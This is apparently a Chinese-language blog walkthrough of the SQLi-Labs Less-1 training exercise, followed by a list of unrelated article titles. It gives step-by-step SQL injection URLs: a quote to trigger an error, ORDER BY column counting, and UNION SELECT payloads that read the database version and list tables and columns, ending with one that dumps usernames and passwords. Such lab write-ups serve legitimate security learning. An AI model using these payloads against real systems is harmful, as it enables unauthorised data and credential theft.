sqllab less-1
一、訪問sqllab 的less-1 按提示加入http://10.9.2.81/Less-1/?id=1sql
二、 後面加入單引號,發生報錯http://10.9.2.81/Less-1/?id=1‘數據庫
三、 測試使用查詢顯示數據行數 http://10.9.2.81/Less-1/?id=1‘ order by 1--+ 數字從1到4 ,到4 時候報錯,能夠顯示數據只有兩行。less
四、 查詢數據庫版本 數據庫名 http://10.9.2.81/Less-1/?id=-1' union select 1,version(),database()--+ 測試
五、查詢庫裏全部表http://10.9.2.81/Less-1/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+3d
六、 查詢表裏的字段名http://10.9.2.81/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27--+orm
七、 查詢表裏用戶名及密碼 http://10.9.2.81/Less-1/?id=-1'union select 2,3,group_concat(username,':',password) from security.users --+ blog
8 結束,經過搜索獲得最終結果,但數據庫查詢語句僅限於瞭解而已,不能靈活應用。it
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. eclipse設置粘貼字符串自動轉義
- 2. android客戶端學習-啓動模擬器異常Emulator: failed to initialize HAX: Invalid argument
- 3. android.view.InflateException: class com.jpardogo.listbuddies.lib.views.ListBuddiesLayout問題
- 4. MYSQL8.0數據庫恢復 MYSQL8.0ibd數據恢復 MYSQL8.0恢復數據庫
- 5. 你本是一個肉體,是什麼驅使你前行【1】
- 6. 2018.04.30
- 7. 2018.04.30
- 8. 你本是一個肉體,是什麼驅使你前行【3】
- 9. 你本是一個肉體,是什麼驅使你前行【2】
- 10. 【資訊】LocalBitcoins達到每週交易比特幣的7年低點